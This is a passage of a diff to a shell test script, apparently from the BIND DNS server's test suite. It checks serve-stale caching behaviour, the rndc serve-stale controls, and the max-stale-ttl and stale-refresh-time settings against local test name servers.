echo_i "failed"; fi +status=$((status+ret)) + +# Step 7. +echo_i "sending query for test $((n+1))" +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) + +# Step 8. 
+n=$((n+1)) +echo_i "check stale data.example TXT comes from cache (stale-refresh-time) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*4.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# +# Test disabling serve-stale via rndc. +# +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc serve-stale off' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale off || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: off (rndc) (stale-answer-ttl=4 max-stale-ttl=3600 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "sending queries for tests $((n+1))-$((n+4))..." 
+$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$((n+4)) + +wait + +n=$((n+1)) +echo_i "check stale data.example TXT (serve-stale off) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale othertype.example CAA (serve-stale off) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nodata.example TXT (serve-stale off) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nxdomain.example TXT (serve-stale off) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# +# Test enabling serve-stale via rndc. +# +n=$((n+1)) +echo_i "running 'rndc serve-stale on' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale on || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (rndc) (stale-answer-ttl=4 max-stale-ttl=3600 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "sending queries for tests $((n+1))-$((n+4))..." 
+$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$((n+4)) + +wait + +n=$((n+1)) +echo_i "check stale data.example TXT (serve-stale on) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*4.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale othertype.example CAA (serve-stale on) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "othertype\.example\..*4.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nodata.example TXT (serve-stale on) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*4.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nxdomain.example TXT (serve-stale on) ($n)" +ret=0 +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*4.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc serve-stale off' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale off || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc serve-stale reset' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale reset || ret=1 +if [ 
$ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (stale-answer-ttl=4 max-stale-ttl=3600 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "sending queries for tests $((n+1))-$((n+4))..." +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$((n+4)) + +wait + +n=$((n+1)) +echo_i "check stale data.example TXT (serve-stale reset) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*4.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale othertype.example CAA (serve-stale reset) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "othertype.example\..*4.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nodata.example TXT (serve-stale reset) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*4.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nxdomain.example TXT (serve-stale reset) ($n)" +ret=0 +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n 
> /dev/null || ret=1 +grep "example\..*4.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc serve-stale off' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale off || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: off (rndc) (stale-answer-ttl=4 max-stale-ttl=3600 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# +# Update named.conf. +# Test server with low max-stale-ttl. +# +echo_i "test server with serve-stale options set, low max-stale-ttl" + +n=$((n+1)) +echo_i "updating ns1/named.conf ($n)" +ret=0 +copy_setports ns1/named2.conf.in ns1/named.conf +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc reload' ($n)" +ret=0 +rndc_reload ns1 10.53.0.1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: off (rndc) (stale-answer-ttl=3 max-stale-ttl=20 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "flush cache, re-enable serve-stale and query again ($n)" +ret=0 +$RNDCCMD 10.53.0.1 flushtree example > rndc.out.test$n.1 2>&1 || ret=1 +$RNDCCMD 10.53.0.1 serve-stale on > rndc.out.test$n.2 2>&1 || ret=1 +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale 
status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (rndc) (stale-answer-ttl=3 max-stale-ttl=20 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache longttl.example TXT (low max-stale-ttl) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 longttl.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache data.example TXT (low max-stale-ttl) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache othertype.example CAA (low max-stale-ttl) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nodata.example TXT (low max-stale-ttl) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nxdomain.example TXT (low 
max-stale-ttl) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$n +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Keep track of time so we can access these RRset later, when we expect them +# to become ancient. +t1=`$PERL -e 'print time()'` + +n=$((n+1)) +echo_i "verify prime cache statistics (low max-stale-ttl) ($n)" +ret=0 +rm -f ns1/named.stats +$RNDCCMD 10.53.0.1 stats > /dev/null 2>&1 +[ -f ns1/named.stats ] || ret=1 +cp ns1/named.stats ns1/named.stats.$n +# Check first 10 lines of Cache DB statistics. After prime queries, we expect +# two active TXT RRsets, one active Others, one nxrrset TXT, and one NXDOMAIN. +grep -A 10 "++ Cache DB RRsets ++" ns1/named.stats.$n > ns1/named.stats.$n.cachedb || ret=1 +grep "2 TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 Others" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 !TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 NXDOMAIN" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +status=$((status+ret)) +if [ $ret != 0 ]; then echo_i "failed"; fi + +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +sleep 2 + +echo_i "sending queries for tests $((n+1))-$((n+4))..." 
+$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) &
+$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$((n+2)) &
+$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$((n+3)) &
+$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$((n+4))
+
+wait
+
+n=$((n+1))
+echo_i "check stale data.example TXT (low max-stale-ttl) ($n)"
+ret=0
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check stale othertype.example CAA (low max-stale-ttl) ($n)"
+ret=0
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "othertype\.example\..*3.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check stale nodata.example TXT (low max-stale-ttl) ($n)"
+ret=0
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+grep "example\..*3.*IN.*SOA" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check stale nxdomain.example TXT (low max-stale-ttl) ($n)"
+ret=0
+grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+grep "example\..*3.*IN.*SOA" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "verify stale cache statistics (low max-stale-ttl) ($n)"
+ret=0
+rm -f ns1/named.stats
+$RNDCCMD 10.53.0.1 stats > /dev/null 2>&1
+[ -f ns1/named.stats ] || ret=1
+cp ns1/named.stats ns1/named.stats.$n
+# Check first 10 lines of Cache DB statistics. 
After serve-stale queries, we
+# expect one active TXT RRset, one stale TXT, one stale nxrrset TXT, and one
+# stale NXDOMAIN.
+grep -A 10 "++ Cache DB RRsets ++" ns1/named.stats.$n > ns1/named.stats.$n.cachedb || ret=1
+grep "1 TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 #TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 #Others" ns1/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 #!TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1
+grep "1 #NXDOMAIN" ns1/named.stats.$n.cachedb > /dev/null || ret=1
+
+status=$((status+ret))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+
+# Retrieve max-stale-ttl value.
+interval_to_ancient=`grep 'max-stale-ttl' ns1/named2.conf.in | awk '{ print $2 }' | tr -d ';'`
+# We add 2 seconds to it since this is the ttl value of the records being
+# tested.
+interval_to_ancient=$((interval_to_ancient + 2))
+t2=`$PERL -e 'print time()'`
+elapsed=$((t2 - t1))
+
+# If elapsed time so far is less than max-stale-ttl + 2 seconds, then we sleep
+# enough to ensure that we'll ask for ancient RRsets in the next queries.
+if [ $elapsed -lt $interval_to_ancient ]; then
+ sleep $((interval_to_ancient - elapsed))
+fi
+
+echo_i "sending queries for tests $((n+1))-$((n+4))..."
+$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) &
+$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$((n+2)) &
+$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$((n+3)) &
+$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$((n+4))
+
+wait
+
+n=$((n+1))
+echo_i "check ancient data.example TXT (low max-stale-ttl) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check ancient othertype.example CAA (low max-stale-ttl) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check ancient nodata.example TXT (low max-stale-ttl) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check ancient nxdomain.example TXT (low max-stale-ttl) ($n)"
+ret=0
+grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Test stale-refresh-time when serve-stale is enabled via rndc.
+# Steps for testing stale-refresh-time option (default).
+# 1. Prime cache data.example txt
+# 2. Disable responses from authoritative server.
+# 3. Sleep for TTL duration so rrset TTL expires (2 sec)
+# 4. Query data.example
+# 5. Check if response come from stale rrset (3 sec TTL)
+# 6. Enable responses from authoritative server.
+# 7. Query data.example
+# 8. Check if response come from stale rrset, since the query
+# is within stale-refresh-time window.
+n=$((n+1))
+echo_i "flush cache, enable responses from authoritative server ($n)"
+ret=0
+$RNDCCMD 10.53.0.1 flushtree example > rndc.out.test$n.1 2>&1 || ret=1
+$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check 'rndc serve-stale status' ($n)"
+ret=0
+$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1
+grep '_default: on (rndc) (stale-answer-ttl=3 max-stale-ttl=20 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Step 1.
+n=$((n+1))
+echo_i "prime cache data.example TXT (stale-refresh-time rndc) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*2.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Step 2.
+n=$((n+1))
+echo_i "disable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Step 3.
+sleep 2
+
+# Step 4.
+n=$((n+1))
+echo_i "sending query for test ($n)"
+$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n
+
+# Step 5.
+echo_i "check stale data.example TXT (stale-refresh-time rndc) ($n)"
+ret=0
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Step 6.
+n=$((n+1))
+echo_i "enable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Step 7.
+echo_i "sending query for test $((n+1))"
+$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1))
+
+# Step 8.
+n=$((n+1))
+echo_i "check stale data.example TXT comes from cache (stale-refresh-time rndc) ($n)"
+ret=0
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Steps for testing stale-refresh-time option (disabled).
+# 1. Prime cache data.example txt
+# 2. Disable responses from authoritative server.
+# 3. Sleep for TTL duration so rrset TTL expires (2 sec)
+# 4. Query data.example
+# 5. Check if response come from stale rrset (3 sec TTL)
+# 6. Enable responses from authoritative server.
+# 7. Query data.example
+# 8. Check if response come from stale rrset, since the query
+# is within stale-refresh-time window.
+n=$((n+1))
+echo_i "updating ns1/named.conf ($n)"
+ret=0
+copy_setports ns1/named3.conf.in ns1/named.conf
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "running 'rndc reload' ($n)"
+ret=0
+rndc_reload ns1 10.53.0.1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check 'rndc serve-stale status' ($n)"
+ret=0
+$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1
+grep '_default: on (rndc) (stale-answer-ttl=3 max-stale-ttl=20 stale-refresh-time=0)' rndc.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "flush cache, enable responses from authoritative server ($n)"
+ret=0
+$RNDCCMD 10.53.0.1 flushtree example > rndc.out.test$n.1 2>&1 || ret=1
+$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Step 1.
+n=$((n+1))
+echo_i "prime cache data.example TXT (stale-refresh-time disabled) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*2.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Step 2.
+n=$((n+1))
+echo_i "disable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Step 3.
+sleep 2
+
+# Step 4.
+n=$((n+1))
+echo_i "sending query for test ($n)"
+$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n
+
+# Step 5.
+echo_i "check stale data.example TXT (stale-refresh-time disabled) ($n)"
+ret=0
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Step 6.
+n=$((n+1))
+echo_i "enable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Step 7.
+echo_i "sending query for test $((n+1))"
+$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1))
+
+# Step 8.
+n=$((n+1))
+echo_i "check data.example TXT comes from authoritative (stale-refresh-time disabled) ($n)"
+ret=0
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*2.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+#
+# Now test server with no serve-stale options set.
+#
+echo_i "test server with no serve-stale options set"
+
+n=$((n+1))
+echo_i "enable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache longttl.example TXT (max-stale-ttl default) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 longttl.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache data.example TXT (max-stale-ttl default) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*2.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache othertype.example CAA (max-stale-ttl default) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 othertype.example CAA > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "othertype\.example\..*2.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache nodata.example TXT (max-stale-ttl default) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
